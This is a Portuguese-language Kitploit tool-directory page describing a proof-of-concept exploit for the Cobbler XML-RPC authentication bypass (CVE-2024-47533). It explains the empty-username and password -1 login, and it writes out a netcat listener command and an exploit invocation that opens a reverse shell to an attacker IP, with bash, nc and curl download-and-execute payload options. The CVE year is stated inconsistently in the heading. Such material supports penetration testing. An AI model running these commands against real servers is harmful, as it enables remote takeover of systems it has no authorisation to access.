Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-47533 — PoC do CVE-2025-47533 Clobber RCE | Kitploit
Ferramentas/GitHubGitHub/zs1n/cve-2024-47533
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubzs1n/cve-2024-47533

CVE-2024-47533

PoC do CVE-2025-47533 Clobber RCE

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-47533 - Exploração de RCE por Bypass de Autenticação XMLRPC no Cobbler

Execução Remota de Código Crítica via Bypass de Autenticação no Cobbler

Implementação do PoC.


Resumo

Cobbler, um servidor de instalação Linux que permite a configuração rápida de ambientes de instalação em rede, possui uma vulnerabilidade de autenticação nas versões 3.0.0 até (mas não incluindo) 3.2.3 e 3.3.7. A função utils.get_shared_secret() sempre retorna -1, permitindo que qualquer pessoa se conecte à interface XML-RPC do Cobbler com um nome de usuário vazio ('') e senha -1. Isso permite que um atacante com acesso à rede obtenha controle total do servidor Cobbler. A vulnerabilidade é corrigida nas versões 3.2.3 e 3.3.7.


🛠 Detalhamento Técnico

A vulnerabilidade é causada pelo tratamento inadequado do segredo compartilhado na função utils.get_shared_secret(), que sempre retorna -1, efetivamente contornando a autenticação. Isso permite que qualquer usuário da rede se conecte à interface XMLRPC do Cobbler com credenciais vazias e execute comandos arbitrários.


🔥 Endpoint Vulnerável

Baixar ferramenta

http://<target>:25151/ — Endpoint da API XMLRPC do Cobbler


💥 Exemplos de Payloads

O script de exploração suporta vários payloads de reverse shell, incluindo:

  • Bash reverse shell
  • Shells Netcat (nc)
  • Download & execução via Curl

Prova de Conceito (PoC)

Preparando o Listener

Inicie um listener Netcat na sua máquina:

root@kitploit:~
nc -lvnp 4444

🚀 Executando a Exploração

Execute o script de exploração CVE-2024-47533.py.

root@kitploit:~
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

Parâmetros

-t : Alvo (Exemplo: -t http://1<IP_SERVICE>:<PORT>)

-l: IP Local (Exemplo: -l 10.10.11.80)

-p : Porta <LOCAL_PORT> (Exemplo: -p 4444)

--payload: Payload (bash, curl, nc) (Exemplo: --payload bash)

💻 Acesso Remoto ao Shell com Sucesso

Após a execução bem-sucedida, o reverse shell se conectará de volta ao listener, concedendo ao atacante acesso remoto ao servidor.